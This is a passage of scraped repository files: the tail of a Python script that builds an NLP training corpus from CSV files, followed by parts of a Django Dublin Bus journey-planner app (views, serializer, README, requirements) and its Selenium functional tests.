open(label, 'r', encoding=label_encoding) as f:\n label_lines = f.readlines()\n label_lines = [line for line in label_lines[1:] if line.strip() != '']\n label_ids = [line.split('\",')[0].replace('\"', '') for line in label_lines]\n labels = [line.split('\",')[1].replace('\"', '') for line in label_lines]\n\n doc_dict = dict(zip(ids, texts))\n label_dict = dict(zip(label_ids, labels))\n\n corpus = []\n for id in doc_dict.keys():\n text = doc_dict.get(id)\n label = label_dict.get(id)\n one = label + '\\t' + text + '\\n'\n corpus.append(one)\n return corpus\n\n\ndef batch_corpus(htmls, labels):\n if not isinstance(htmls, list):\n raise ValueError('htmls should be a list object')\n if not isinstance(labels, list):\n raise ValueError('labels should be a list object')\n if len(htmls) != len(labels):\n raise Exception('The length of htmls and labels should be equal')\n\n l = len(htmls)\n all_corpus = []\n for i in range(l):\n html = htmls[i]\n label = labels[i]\n corpus = get_corpus(html, label)\n all_corpus.extend(corpus)\n\n return all_corpus\n\n\nif __name__ == '__main__':\n import os\n\n base_path1 = 'C:/Users/ywwl/Desktop/文章/7/'\n base_path2 = 'C:/Users/ywwl/Desktop/文章/8/'\n htmls1 = ['html0.csv', 'html1.csv', 'html2.csv', 'html3.csv', 'html4.csv']\n labels1 = ['label0.csv', 'label1.csv', 'label2.csv', 'label3.csv', 'label4.csv']\n htmls2 = ['html1.csv', 'html2.csv', 'html3.csv', 'html4.csv', 'html5.csv', 'html6.csv']\n labels2 = ['label1.csv', 'label2.csv', 'label3.csv', 'label4.csv', 'label5.csv', 'label6.csv']\n htmls1 = [os.path.join(base_path1, i) for i in htmls1]\n labels1 = [os.path.join(base_path1, i) for i in labels1]\n htmls2 = [os.path.join(base_path2, i) for i in htmls2]\n labels2 = [os.path.join(base_path2, i) for i in labels2]\n\n corpus1 = batch_corpus(htmls1, labels1)\n corpus2 = batch_corpus(htmls2, labels2)\n\n path3 = 'C:/Users/ywwl/Desktop/文章/alldata3.txt'\n with open(path3, 'r', encoding='utf8') as f:\n lines = f.readlines()\n corpus1.extend(corpus2)\n corpus1.extend(lines)\n ok_lines = [i for i in corpus1 if len(i.split('\\t')[1].strip()) > 50]\n with open('C:/Users/ywwl/Desktop/文章/alldata.txt', 'w', encoding='utf8') as f:\n f.write(''.join(ok_lines))\n" }, { "alpha_fraction": 0.44697248935699463, "alphanum_fraction": 0.45211008191108704, "avg_line_length": 35.33333206176758, "blob_id": "e483d12cdd37cf8639b2c64499a549bdb8733f5d", "content_id": "ba0d5964bfda9608b2217c340f86ca1eb620661f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2743, "license_type": "no_license", "max_line_length": 91, "num_lines": 75, "path": "/cleardata/standardiz_data_from_raw_fomat.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\nimport csv\nfrom pathlib import Path\n\nimport cchardet\n\nfrom utils.html_parser import parser_external_html\n\n\nclass Data:\n def __init__(self, title='', content='', labels=''):\n self.title = title\n self.content = content\n self.labels = labels\n\n\ndef detect_code_type(file):\n return cchardet.detect(open(file, 'rb').read())['encoding']\n\n\ndef integrate(dir_path):\n datum = {}\n root = Path(dir_path)\n for sub_dir in root.iterdir():\n if sub_dir.is_dir():\n print(sub_dir)\n for file in sub_dir.iterdir():\n print(\"processing file: \", file.name)\n if file.suffix == '.csv':\n code_type = detect_code_type(file)\n head_line = True\n for line in file.open(encoding=code_type):\n if head_line: # skip title\n head_line = False\n continue\n line = line.strip()\n if len(line) == 0: # skip blank line\n continue\n line = line[1:-2]\n fields = line.split('\",\"')\n if len(fields) < 2:\n print(\"file: %s\\nline: %s\" % (file.name, line))\n if 'html' in file.name or '内容' in file.name:\n doc_id = fields[0]\n html = fields[1]\n content = parser_external_html(html)\n if not datum.get(doc_id, None):\n datum[doc_id] = Data(content=content)\n else:\n datum[doc_id].content = content\n elif 'label' in file.name or '标签' in file.name:\n doc_id = fields[0]\n labels = fields[1]\n if not datum.get(doc_id, None):\n datum[doc_id] = Data(labels=labels)\n else:\n datum[doc_id].labels = labels\n\n print(\"Total data num: \", len(datum))\n return datum\n\n\ndef write(datum, o_path):\n o_path = Path(o_path)\n with open(o_path, \"w\", encoding='utf8') as f:\n for _, data in datum.items():\n if data.labels and len(data.content) >= 30 and len(data.content.split()) >= 10:\n f.write(\"%s\\t%s\\t%s\\n\" % (data.labels, data.content, data.title))\n print(\"finished!\")\n\n\nif __name__ == '__main__':\n path = \"/Users/iron/Documents/wechat\"\n datum = integrate(path)\n write(datum, '/Users/iron/Documents/公众号项目/alldata.tsv')\n" }, { "alpha_fraction": 0.8518518805503845, "alphanum_fraction": 0.8518518805503845, "avg_line_length": 12.5, "blob_id": "24be084c5a4dfd26beeb1c06f5ee211d8884fd24", "content_id": "b627eea71f1dc164c5da44ce9c4f72b464cf6d5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/README.md", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# NlpLearning\n自然语言处理从入门到入土\n" } ]
11
Takox/PythonServerAlumno
https://github.com/Takox/PythonServerAlumno
7940d5148ad01b112bd52c860ddf30cc318c7280
40cb66be28d01ffd6a52a616e01577564c8f4f3b
18d3315a68fe631f91f3ddde64c541df41805f26
refs/heads/master
2020-04-18T09:33:15.353579
2019-02-22T10:19:24
2019-02-22T10:19:24
167,438,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7198697328567505, "alphanum_fraction": 0.7263843417167664, "avg_line_length": 33.14814758300781, "blob_id": "b7ba64e8a627c6b3097bd8e44035e2ad06732d16", "content_id": "a7e8695bd5562233f07300bcbd416e459902f84c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 921, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/alumnoapp/views.py", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom .models import Alumnos\nfrom .serializers import AlumnosSerializers\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\nclass AlumnosViewSet(viewsets.ModelViewSet):\n queryset = Alumnos.objects.all()\n serializer_class = AlumnosSerializers\n\n def delete(self, request, pk, format=None):\n alumno= self.get_object(pk)\n alumno.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def put(self, request, pk, format=None):\n alumno= self.get_object(pk)\n serializer = AlumnosSerializers(alumno, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)" }, { "alpha_fraction": 0.8121212124824524, "alphanum_fraction": 0.8121212124824524, "avg_line_length": 65, "blob_id": "de88c674a000a8fec7b18324a274c28428153fac", "content_id": "340cd14763c10c9e516f5bfb4dc339022aac2a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 331, "license_type": "no_license", "max_line_length": 155, "num_lines": 5, "path": "/README.md", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "# PythonServerAlumno\n\nServidor REST desarrollado con el Framework Django y Python para administrar los datos de una BD alojado tanto en local como en la nube (Google App Engine)\n\nPara actualizar los modelos de la BD se puede hacer con el comando inspectdb o el makemigrations -> migrate dependiendo del origen de la modificación.\n" }, { "alpha_fraction": 0.7257384061813354, "alphanum_fraction": 0.7257384061813354, "avg_line_length": 33, "blob_id": "07cc9ef017a8c4418b753b020763a2f131606f12", "content_id": "ca7ebdb52fd90ed6abc7a14b31a10bbb12d0e588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 74, "num_lines": 7, "path": "/alumnoapp/serializers.py", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Alumnos\n\nclass AlumnosSerializers(serializers.ModelSerializer):\n class Meta:\n model = Alumnos\n fields = '__all__' # si ponemos esto hace le CRUD de operaciones" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.7341772317886353, "avg_line_length": 18.75, "blob_id": "5fcb1eb6756dfa1315274f2ca0bcdb45586667cd", "content_id": "3040a2753e69628b7c59438164af56f87cde08df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 79, "license_type": "no_license", "max_line_length": 28, "num_lines": 4, "path": "/requirements.txt", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "Django==2.1.6\ndjangorestframework == 3.9.1\ndjango-cors-headers \nPyMySQL==0.9.2\n" } ]
4
vijpandaturtle/robotic-arm-pick-and-place
https://github.com/vijpandaturtle/robotic-arm-pick-and-place
3ff70440f1b570da2d055d7f352a0c10ef5611b1
ec02f0fb309ebe26f68d214d9050ce9a7cd4461d
a271ecda96fd5579e4dd032b48676ee303cb5fd8
refs/heads/master
2020-12-03T02:30:19.164444
2017-11-06T13:58:23
2017-11-06T13:58:23
95,946,524
4
3
null
2017-07-01T06:27:31
2017-07-11T16:15:05
2017-08-15T15:36:54
Python
[ { "alpha_fraction": 0.4831751585006714, "alphanum_fraction": 0.5442622900009155, "avg_line_length": 40.99275207519531, "blob_id": "06f75ff72add50cb144839d3b28630a7a62e9337", "content_id": "02486aecd1855997b121b04b443db774c342380d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5795, "license_type": "no_license", "max_line_length": 157, "num_lines": 138, "path": "/IK_server.py", "repo_name": "vijpandaturtle/robotic-arm-pick-and-place", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport rospy\nimport tf\nfrom kuka_arm.srv import *\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\nfrom geometry_msgs.msg import Pose\nfrom mpmath import *\nfrom sympy import *\n\n# Define Modified DH Transformation matrix\ndef transform(q , a, d, alpha):\n transform = Matrix([ [cos(q), -sin(q), 0, a], [sin(q)*cos(alpha), cos(q)*cos(alpha), -sin(alpha), -sin(alpha)*d], [sin(q)*sin(alpha), cos(q)*sin(alpha),\n cos(alpha), cos(alpha)*d], [0, 0, 0, 1] ])\n return transform\n\n\ndef handle_calculate_IK(req):\n rospy.loginfo(\"Received %s eef-poses from the plan\" % len(req.poses))\n if len(req.poses) < 1:\n print \"No valid poses received\"\n return -1\n else:\n # Initialize service response\n joint_trajectory_list = []\n # Define DH param symbols\n q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8')\n d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8')\n alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6= symbols('alpha0:7')\n a0, a1, a2, a3, a4, a5, a6 = symbols('a0:7')\n # Define additional symbols for roll, pitch and yaw for the end-effector orientation\n r, p, y = symbols('r p y')\n # Rotation Matrices for x,y and z consisting of end effector orientation parameters\n R_x = Matrix([[1, 0, 0], [0, cos(r), -sin(r)], [0, sin(r), cos(r)]])\n R_y = Matrix([[cos(p), 0, sin(p)], [0, 1, 0], [-sin(p), 0, cos(p)]])\n R_z = Matrix([[cos(y), -sin(y), 0], [sin(y), cos(y), 0], [0, 0, 1]])\n\n # Joint angle symbols\n # Modified DH params\n s = { d1 : 0.75, alpha0 : 0, a0 : 0,\n d2 : 0, alpha1 : -pi/2, a1 : 0.35, q2 : q2 - pi/2,\n d3 : 0, alpha2 : 0, a2 : 1.25,\n d4 : 1.50, alpha3 : -pi/2, a3 : -0.054,\n d5 : 0, alpha4 : pi/2, a4 : 0,\n d6 : 0, alpha5 : -pi/2, a5 : 0,\n d7 : 0.303,alpha6 : 0, a6 : 0, q7 : 0\n }\n print \"1 after dh\"\n\n # Create individual transformation matrices\n T0_1 = transform(q1, a0, d1, alpha0)\n T0_1 = T0_1.subs(s)\n T1_2 = transform(q2, a1, d2, alpha1)\n T1_2 = T1_2.subs(s)\n T2_3 = transform(q3, a2, d3, alpha2)\n T2_3 = T2_3.subs(s)\n T3_4 = transform(q4, a3, d4, alpha3)\n T3_4 = T1_2.subs(s)\n T4_5 = transform(q5, a4, d5, alpha4)\n T4_5 = T4_5.subs(s)\n T5_6 = transform(q6, a5, d6, alpha5)\n T5_6 = T5_6.subs(s)\n T6_G = transform(q7, a6, d7, alpha6)\n T6_G = T6_G.subs(s)\n print \"2 after transforms\"\n\n # Transformation to find end-effector position\n T0_G = T0_1*T1_2*T2_3*T3_4*T4_5*T5_6*T6_G\n print \"3 before loop\"\n\n for x in xrange(0, len(req.poses)):\n print \"4 inside loop\"\n # IK code starts here\n joint_trajectory_point = JointTrajectoryPoint()\n # Extract end-effector position and orientation from request\n # px,py,pz = end-effector position\n # roll, pitch, yaw = end-effector orientation\n px = req.poses[x].position.x\n py = req.poses[x].position.y\n pz = req.poses[x].position.z\n\n (roll, pitch, yaw) = tf.transformations.euler_from_quaternion(\n [req.poses[x].orientation.x, req.poses[x].orientation.y,\n req.poses[x].orientation.z, req.poses[x].orientation.w])\n\n # Calculate joint angles using Geometric IK method\n # Calculating positions of the wrist center\n\n end_effector_pos = Matrix([px, py, pz])\n R0_6 = R_z*R_y*R_x\n\n R_correction = R_z.subs(y,pi)*R_y.subs(p,-pi/2)\n R0_6 = R0_6 * R_correction\n R0_6 = R0_6.subs({'r': roll, 'p': pitch, 'y': yaw})\n\n wrist_center = end_effector_pos - (0.303)*R0_6[:,2]\n\n Wx, Wy, Wz = wrist_center[0], wrist_center[1], wrist_center[2]\n\n side_a = 1.50\n side_b = sqrt(pow(sqrt(Wx**2 + Wy**2) - 0.35,2) + pow((Wz - 0.75),2))\n side_c = 1.25\n angle_a = acos((side_b**2 + side_c**2 - side_a**2)/(2*side_b*side_c))\n angle_b = acos((side_a**2 + side_c**2 - side_b**2)/(2*side_a*side_c))\n angle_c = acos((side_a**2 + side_b**2 + side_c**2)/(2*side_a*side_b))\n # Finding the first three joint angles using trigonometry\n theta1 = atan2(Wy, Wx)\n theta2 = pi/2 - angle_a - atan2((Wz - 0.75), sqrt(Wx**2 + Wy**2) - 0.35)\n theta3 = pi/2 - angle_b + 0.036\n\n # Finding the last three joint angles\n R0_3 = T0_1[0:3,0:3]*T1_2[0:3,0:3]*T2_3[0:3,0:3]\n R0_3 = R0_3.evalf(subs={q1:theta1, q2:theta2, q3:theta3})\n # Using the matrix containing last three transforms to calculate last three thetas\n R3_6 = R0_3.inv('LU')*R0_6\n\n theta4 = atan2(R3_6[2,2], -R3_6[0,2])\n theta5 = atan2(sqrt(R3_6[0,2]**2 + R3_6[2,2]**2), R3_6[1,2])\n theta6 = atan2(-R3_6[1,1], R3_6[1,0])\n\n # Populate response for the IK request\n # In the next line replace theta1,theta2...,theta6 by your joint angle variables\n \t joint_trajectory_point.positions = [theta1, theta2, theta3, theta4, theta5, theta6]\n \t joint_trajectory_list.append(joint_trajectory_point)\n\n rospy.loginfo(\"length of Joint Trajectory List: %s\" % len(joint_trajectory_list))\n return CalculateIKResponse(joint_trajectory_list)\n\n\ndef IK_server():\n # initialize node and declare calculate_ik service\n rospy.init_node('IK_server')\n s = rospy.Service('calculate_ik', CalculateIK, handle_calculate_IK)\n print \"Ready to receive an IK request\"\n rospy.spin()\n\nif __name__ == \"__main__\":\n IK_server()\n" }, { "alpha_fraction": 0.6256316900253296, "alphanum_fraction": 0.6958169341087341, "avg_line_length": 49.16901397705078, "blob_id": "34bc5614eeb5012789b3e0f5947f93aad335b11a", "content_id": "4f7f8ebeb4a8ffbc0cb05268497eeaa3cd044f81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7133, "license_type": "no_license", "max_line_length": 394, "num_lines": 142, "path": "/writeup_template.md", "repo_name": "vijpandaturtle/robotic-arm-pick-and-place", "src_encoding": "UTF-8", "text": "## Project: Kinematics Pick & Place\n---\n\n\n**Steps to complete the project:** \n\n\n1. Set up your ROS Workspace.\n2. Download or clone the [project repository](https://github.com/udacity/RoboND-Kinematics-Project) into the ***src*** directory of your ROS Workspace. \n3. Experiment with the forward_kinematics environment and get familiar with the robot.\n4. Launch in [demo mode](https://classroom.udacity.com/nanodegrees/nd209/parts/7b2fd2d7-e181-401e-977a-6158c77bf816/modules/8855de3f-2897-46c3-a805-628b5ecf045b/lessons/91d017b1-4493-4522-ad52-04a74a01094c/concepts/ae64bb91-e8c4-44c9-adbe-798e8f688193).\n5. Perform Kinematic Analysis for the robot following the [project rubric](https://review.udacity.com/#!/rubrics/972/view).\n6. Fill in the `IK_server.py` with your Inverse Kinematics code.\n\n\n[//]: # (Image References)\n\n[image1]: ./images/zero_config.png\n[image2]: ./images/walthrough_diagram.png\n[image3]: ./images/matrix.png\n[image4]: ./images/result.png\n\n## [Rubric](https://review.udacity.com/#!/rubrics/972/view) Points\n### Here I will consider the rubric points individually and describe how I addressed each point in my implementation. \n\n---\n### Writeup / README\n\n#### 1. Provide a Writeup / README that includes all the rubric points and how you addressed each one. You can submit your writeup as markdown or pdf. \n\nYou're reading it!\n\n### Kinematic Analysis\n#### 1. Run the forward_kinematics demo and evaluate the kr210.urdf.xacro file to perform kinematic analysis of Kuka KR210 robot and derive its DH parameters.\n\nThe forward kinematics code was fairly easy to implementation and involved filling in the values in the DH parameter table. The urdf file consisting of the position of each joint relative to it's preceeding joint so the parameters were very intuitive.\nIn order to calculate the DH parameters I used the sketch of the arm in it's zero configuration.\n\n![alt text][image1]\n\n\n\n#### 2. Using the DH parameter table you derived earlier, create individual transformation matrices about each joint. In addition, also generate a generalized homogeneous transform between base_link and gripper_link using only end-effector(gripper) pose.\n\n***DH Parameter Table***\n---\n\n| Joint | ∝(i-1) | a(i-1) | θ(i) | d(i) |\n|---|---|---|---|---|\n| 1 | 0 | 0 | θ1 | 0.75 |\n| 2 | -pi/2 | 0.35 | θ2 - pi/2 | 0 |\n| 3 | 0 | 1.25 | θ3 | 0 |\n| 4 | -pi/2 | - 0.054 | θ4 | 1.50 |\n| 5 | pi/2 | 0 | θ5 | 0 |\n| 6 | -pi/2 | 0| θ6 | 0 |\n| Gripper Frame (End-effector) | 0 | 0 | 0 | 0.303 |\n\nThis is the homogeneous transform matrix that I used to perform operations for forward kinematics i.e to transform from the base frame to the gripper frame. This equation is the matrix as per the dh parameter convention\n\n![alt text][image3]\n\nThe following matrix is obtained by peforming alternate rotations and translations about the dh parameters **alpha**, **a**, **theta** and **d** respectively. Now to obtain transforms between consecutive frames, I simply substituted corresponding values from the dh parameter table.\n\nThese are the individual transform matrices based on the DH parameter table.\n\n```python\nT0_1 = [[cos(q1), -sin(q1), 0, 0],\n [sin(q1), cos(q1), 0, 0],\n [0, 0, 1, 0.750000000000000],\n [0, 0, 0, 1]]\n\nT1_2 = [[sin(q2), cos(q2), 0, 0.350000000000000],\n [0, 0, 1, 0],\n [cos(q2), -sin(q2), 0, 0],\n [0, 0, 0, 1]]\n\nT2_3 = [[cos(q3), -sin(q3), 0, 1.25000000000000],\n [sin(q3), cos(q3), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]]\n\nT3_4 = [[cos(q4), -sin(q4), 0, -0.0540000000000000],\n [0, 0, 1, 1.50000000000000],\n [-sin(q4), -cos(q4), 0, 0],\n [0, 0, 0, 1]]\n\nT4_5 = [[cos(q5), -sin(q5), 0, 0],\n [0, 0, -1, 0],\n [sin(q5), cos(q5), 0, 0],\n [0, 0, 0, 1]]\n\nT5_6 = [[cos(q6), -sin(q6), 0, 0],\n [0, 0, 1, 0],\n [-sin(q6), -cos(q6), 0, 0],\n [0, 0, 0, 1]]\n\nT6_G = [[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0.303000000000000],\n [0, 0, 0, 1]]\n```\n\nTo obtain the total transforms from the base_frame to the gripper_frame, is simply a product of all the consecutive transform matrices, in the reverse order. For this purpose I used sympy library which has an inbuilt class available for matrix operations.\n\n```python\nT0_G = T0_1*T1_2*T2_3*T3_4*T4_5*T5_6*T6_G\n```\n\n#### 3. Decouple Inverse Kinematics problem into Inverse Position Kinematics and inverse Orientation Kinematics; doing so derive the equations to calculate all individual joint angles.\n\nThis was the hardest part of the project for me. I took a lot of time to visualize the thetas especially theta2 and theta3. These thetas are represented as q1,q2,q3.. in the DH parameter table. Here is a diagram that aided me in visualization.\n\n![alt text][image2]\n\nThe axes represented in this image correspond to the sqrt(x^2 + y^2) and z axes. The triangle between joints 2, 3 and 5 can be evaluated by projecting it onto this frame. As per these axes, and using the diagram provided in section 1 for reference side_a and side_c can be easily found. As for side_b, the given co-ordinates are srqt(Wx^2 + Wy^2) and Wz. So the formula is something like this :\n\n```python\nside_b = sqrt(pow(sqrt(Wx**2 + Wy**2) - 0.35,2) + pow((Wz - 0.75),2))\n```\nThe terms 0.35 and 0.75 are the distance to be subtracted because the co-ordinates of wrist are calculated with respect to the base frame.\nFinding the angles of the triangle is easy, with the use of the cosine rule. Acoording to the above parameters, I have calculated values of thetas 1-3. For deriving theta 4-6, I used equations provided in the euler angles of rotation matrix section. Below, are the equations for thetas1-6\n\n```python\n# Angles for end-effector position\ntheta1 = atan2(Wy, Wx)\ntheta2 = pi/2 - angle_a - atan2((Wz - 0.75), sqrt(Wx**2 + Wy**2) - 0.35)\ntheta3 = pi/2 - angle_b + 0.036\n# Angles for end-effector orientation\ntheta4 = atan2(R3_6[2,2], -R3_6[0,2])\ntheta5 = atan2(sqrt(R3_6[0,2]**2 + R3_6[2,2]**2), R3_6[1,2])\ntheta6 = atan2(-R3_6[1,1], R3_6[1,0])\n```\n\n### Project Implementation\n\n#### 1. Fill in the `IK_server.py` file with properly commented python code for calculating Inverse Kinematics based on previously performed Kinematic Analysis. Your code must guide the robot to successfully complete 8/10 pick and place cycles. Briefly discuss the code you implemented and your results.\n\nThe inverse kinematics code was fairly easy once I was able to visualize the sides of the triangle formed by joints 2, 3 and 5. There are the x and y co-ordinates and also correction terms to adjust the position of the frame because the wrist center is calculated with respect to the base frame. A brief explanation of my analysis of the IK problem can be found under rubric section 3.\nAlthough, the angles are calculated accurately, there is room for more improvement, because I have not provided multiple solutions for each angle. Doing this will improve my solution of the IK problem.\nI ran the simulation thrice, because it repeatedly kept crashing, and completed 2/3 cycles successfully. Below is a screenshot of my arm in simulation.\n\n![alt text][image4]\n" } ]
2
rachelcourtney/Dublin_Bus
https://github.com/rachelcourtney/Dublin_Bus
751d3bdc95cc9a2749dd878f1d268f5462184083
a37d51c09b7ee62a7080193af806c9094a7e99a1
c507912d3967ab94e80ac177d4650bee31408690
refs/heads/main
2023-07-12T00:33:04.818311
2021-08-21T09:46:21
2021-08-21T09:46:21
381,866,677
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.682285726070404, "alphanum_fraction": 0.682285726070404, "avg_line_length": 30.25, "blob_id": "117a68eead84772ed6524ce34b1f5cbdb7c0b71e", "content_id": "dd14d317d1c6e64f243caa58ebe80d278e4668fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 102, "num_lines": 56, "path": "/Dublin_Bus/Bus/views.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom requests import get\nfrom django.core import serializers\nimport json\nfrom .models import Stop, WeatherPrediction\nfrom .busmodels import get_prediction\nfrom .gtfsrealtime import get_arrivals\nfrom users.models import favourite\nfrom django.conf import settings\nfrom django.db.models import Max\n\n\n# Create your views here.\ndef index(request):\n favourites_json = serializers.serialize(\"json\", favourite.objects.filter(user_id=request.user.id))\n bus_stops_json = serializers.serialize(\"json\", Stop.objects.all())\n lastDate = WeatherPrediction.objects.aggregate(Max('dt'))\n context = {\n 'bus_stops': bus_stops_json,\n 'favourites': favourites_json,\n 'last_time': lastDate['dt__max'],\n 'MAP_API_KEY': settings.MAP_API_KEY\n }\n if request.method == 'POST':\n favourite_id = request.POST.get('favourite_id')\n try:\n context['journey'] = favourite.objects.get(id=favourite_id)\n except:\n pass\n return render(request, 'Bus/index.html', context)\n\n\n# handle request for stop_data\ndef fetch_arrivals(request):\n if request.method == \"POST\":\n stop_pk = json.loads(request.body)\n data = get_arrivals(stop_pk)\n return JsonResponse(data)\n else:\n return redirect('index')\n\n\n# handle parameters for predictions\ndef send_to_model(request):\n if request.method == \"POST\":\n model_params = json.loads(request.body)\n prediction = {}\n prediction['current_pred'] = get_prediction(model_params)\n return JsonResponse(prediction)\n else:\n return redirect('index')\n\n\ndef twitter(request):\n return render(request, 'Bus/twitter.html')\n" }, { "alpha_fraction": 0.581105649471283, "alphanum_fraction": 0.5956091284751892, "avg_line_length": 35.01639175415039, "blob_id": "a153f717236cfbd420f3a49b67b32ecef2e1636e", "content_id": "665960caed467ef011adc3bc4cd63fafda2c8371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17582, "license_type": "no_license", "max_line_length": 147, "num_lines": 488, "path": "/Dublin_Bus/functional_tests/tests_index.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom Bus.models import Stop\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\nimport time\n\n\nUser = auth.get_user_model()\n\nclass IndexFunctionalTests(StaticLiveServerTestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.login_url = self.live_server_url + reverse(\"login\")\n\n def tearDown(self) -> None:\n self.browser.close()\n\n def test_index_noOrigin(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid starting point.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n def test_index_noDestin(self):\n self.browser.get(self.live_server_url)\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n time.sleep(3)\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid destination.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n\n def test_index_submitRoute(self):\n self.browser.get(self.live_server_url)\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n destinInput = self.browser.find_element_by_id('inputDestin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n destinInput.send_keys(\"Trinity College\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n \n time.sleep(3)\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n time.sleep(1)\n\n self.assertNotEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n\n def test_index_FavouriteButton_noOrigin(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n\n self.browser.find_element_by_id('favouriteButton').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid starting point.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n def test_index_FavouriteButton_noDestin(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n time.sleep(3)\n self.browser.find_element_by_id('favouriteButton').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid destination.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n\n def test_index_favouriteButton(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n wait = WebDriverWait(self.browser, 10)\n originInput = 